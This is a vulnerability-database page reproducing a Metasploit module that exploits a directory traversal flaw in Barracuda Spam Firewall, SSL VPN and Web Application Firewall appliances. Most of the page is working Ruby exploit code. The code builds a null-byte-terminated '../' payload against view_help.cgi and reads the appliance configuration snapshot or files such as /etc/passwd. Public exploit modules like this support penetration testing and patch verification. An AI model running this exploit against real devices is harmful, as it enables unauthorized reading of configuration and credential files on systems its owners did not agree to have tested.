Vulners
Lucene search
Barracuda Multiple Product Locale Directory Traversal
🗓️ 01 Sep 2024 00:00:00Reported by Tiago Ferreira, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 138 Views
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Barracuda Multiple Product "locale" Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability present in
several Barracuda products, including the Barracuda Spam and Virus Firewall,
Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default,
this module will attempt to download the Barracuda configuration file.
},
'References' =>
[
['OSVDB', '68301'],
['URL', 'https://web.archive.org/web/20101004131244/http://secunia.com/advisories/41609/'],
['EDB', '15130']
],
'Author' =>
[
'Tiago Ferreira <tiago.ccna[at]gmail.com>'
],
'DisclosureDate' => 'Oct 08 2010',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(8000),
OptString.new('FILE', [ true, "Define the remote file to view, ex:/etc/passwd", '/mail/snapshot/config.snapshot']),
OptString.new('TARGETURI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),
])
end
def run_host(ip)
uri = normalize_uri(target_uri.path)
file = datastore['FILE']
payload = "?locale=/../../../../../../..#{file}%00"
print_status("#{full_uri} - Barracuda - Checking if remote server is vulnerable")
res = send_request_raw(
{
'method' => 'GET',
'uri' => uri + payload,
}, 25)
if res.nil?
print_error("#{full_uri} - Connection timed out")
return
end
if (res.code == 200 and res.body)
if res.body.match(/\<html\>(.*)\<\/html\>/im)
html = $1
if res.body =~ /barracuda\.css/
if html.length > 100
file_data = html.gsub(%r{</?[^>]+?>}, '')
print_good("#{full_uri} - Barracuda - Vulnerable")
print_good("#{full_uri} - Barracuda - File Output:\n" + file_data + "\n")
else
print_error("#{full_uri} - Barracuda - Not vulnerable: HTML too short?")
end
elsif res.body =~ /help_page/
print_error("#{full_uri} - Barracuda - Not vulnerable: Patched?")
else
print_error("#{full_uri} - Barracuda - File not found or permission denied")
end
else
print_error("#{full_uri} - Barracuda - No HTML was returned")
end
else
print_error("#{full_uri} - Barracuda - Unrecognized #{res.code} response")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2024 00:00Current
7.4High risk
Vulners AI Score7.4